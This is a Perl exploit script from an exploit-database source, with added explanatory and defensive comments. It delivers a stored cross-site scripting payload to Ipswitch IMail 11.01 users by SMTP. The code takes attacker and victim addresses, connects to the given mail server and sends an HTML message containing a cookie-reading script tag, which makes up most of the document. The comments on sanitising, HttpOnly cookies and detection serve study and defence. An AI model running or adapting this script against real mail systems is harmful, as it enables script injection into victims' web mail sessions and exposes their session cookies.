#!/usr/bin/perl
#
# Source banner: 1337day.com / Inj3ct0r Team
#   ">> Exploit database separated by exploit type (local, remote, DoS, etc.)"
#   [+] Site           : 1337day.com
#   [+] Support e-mail : submit[at]1337day.com
#   I'm DaOne member from Inj3ct0r Team
#   (the ASCII-art logo did not survive extraction and is omitted)
#
# Exploit Title: Ipswitch IMail 11.01 Stored XSS Vulnerability
# Date: 26-04-2013
# Author: DaOne aka Mocking Bird
# Vendor Homepage: http://www.ipswitch.com/
# Platform: windows
#
# What this script does: it opens an SMTP session to the given mail server
# and submits one multipart/mixed message whose text/html part contains a
# <script> element calling alert(document.cookie). Per the advisory title,
# the issue is that the stored message is later rendered with the script
# intact (presumably by the product's web mail view -- the page does not say
# which component).
#
# Defensive notes for reviewers:
#   * Root cause class: HTML mail bodies shown in a browser context without
#     neutralising active content. The fix belongs at render time: sanitise
#     HTML parts against an allow-list before display.
#   * Impact reduction: mark session cookies HttpOnly so document.cookie
#     cannot read them, and serve the mail view with a restrictive
#     Content-Security-Policy.
#   * Detection: this sample is static. The HELO string 'Hello world', the
#     fixed MIME boundary, "From: XSS" and "Subject: testing" are all
#     constant, and a gateway can also flag <script> inside text/html parts.

use Net::SMTP;

# Exactly three positional arguments are required; anything else prints the
# usage text and exits with status 0.
unless (@ARGV == 3) {
    print "\nUSAGE: IMail.pl <Mail Server> <Attacker Email> <VicTim Email>\n";
    exit;
}

# Positional arguments: SMTP host, envelope sender, envelope recipient.
my ($host, $attacker, $victim) = @ARGV;

# Open the SMTP session (30 second timeout, fixed HELO string).
my $smtp = Net::SMTP->new(
    Host    => $host,
    Hello   => 'Hello world',
    Timeout => 30,
);
die "Couldn't connect to Mail Server\n" unless $smtp;

# Envelope: MAIL FROM and RCPT TO come straight from the command line.
$smtp->mail($attacker);
$smtp->to($victim);

# Boundary token exactly as declared in the Content-Type header; the part
# delimiters below are this token prefixed with "--".
my $boundary = '--=45145578442838848853975045745715171602582966277178406402638054315034128543847104614337851625097187549984363453814450535441019';

# Message headers followed by a single text/html part. The pieces are joined
# with no separator, so the resulting string is the same as the original
# concatenation.
my $buffer = join '',
    "From: XSS\n",
    "To: testing\n",
    "Subject: testing\n",
    "MIME-Version: 1.0\n",
    "Content-Type: multipart/mixed;\n",
    " boundary=\"${boundary}\"\n\n",
    "--${boundary}\n",
    "Content-Type: text/html;\n",
    "charset=\"utf-8\"\n",
    "Content-Transfer-Encoding: quoted-printable\n\n",
    "XSS\n",
    "<!DOCTYPE HTML PUBLIC \"-//W3C//DTD HTML 4.0 Transitional//EN\">\n",
    "<HTML><BODY>\n",
    # Active content under test: a cookie-reading alert, i.e. a visible
    # marker that script ran in the mail view's origin.
    "<script >alert(document.cookie)</script >\n",
    "</BODY></HTML>\n\n",
    "--${boundary}--";

# Hand the message to the server and close the session. Return values of the
# SMTP calls are not checked, so "Send." is printed unconditionally.
$smtp->data();
$smtp->datasend($buffer);
$smtp->quit();

print "Send.\n";

# Proof http://oi40.tinypic.com/34yw8hz.jpg